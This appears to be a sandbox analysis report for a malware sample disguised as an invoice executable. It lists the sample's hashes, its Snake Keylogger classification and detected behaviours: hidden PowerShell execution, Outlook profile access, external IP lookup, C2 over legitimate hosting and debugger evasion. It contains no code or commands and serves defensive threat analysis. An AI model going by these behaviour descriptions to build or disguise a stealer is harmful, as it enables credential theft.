Extracted

• • Target

    CMS AGE Invoice 8 March 2025 sign.exe

  • Size

    1.0MB

  • MD5

    70b411c7aa1753649f16bf40ff715e15

  • SHA1

    25164d02b05a3d22a63e47ab09fd8f5c96650a8c

  • SHA256

    4723dee89c57a6cd8008358779826bfb0a6385f40dd852ad1bbba3e5e6d6758c

  • SHA512

    722116926312bb80a85eda1af64876dff2802f4d29e3a2d5b1f7366076c8d0d8137cb4bdb29282b95a731a3b160ba0fec3ecc701cd802e3758c592b253086851

  • SSDEEP

    24576:QG8tBFBiemT0AxlhvMh85j+nJuhUwY+s6iA4GuaJjt8c:TeHixKyjIJuJ26Idc

  Score

  10^/10

  snakekeyloggercollectiondiscoveryexecutionkeyloggerstealer

  • Snake Keylogger

    Keylogger and Infostealer first seen in November 2020.

    stealerkeyloggersnakekeylogger

  • Snake Keylogger payload

  • Snakekeylogger family

    snakekeylogger

  • Command and Scripting Interpreter: PowerShell

    Run Powershell and hide display window.

    execution

  • Accesses Microsoft Outlook profiles

    collection

  • Blocklisted process makes network request

  • Legitimate hosting services abused for malware hosting/C2

  • Looks up external IP address via web service

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger

  • Suspicious use of NtSetInformationThreadHideFromDebugger

  behavioral1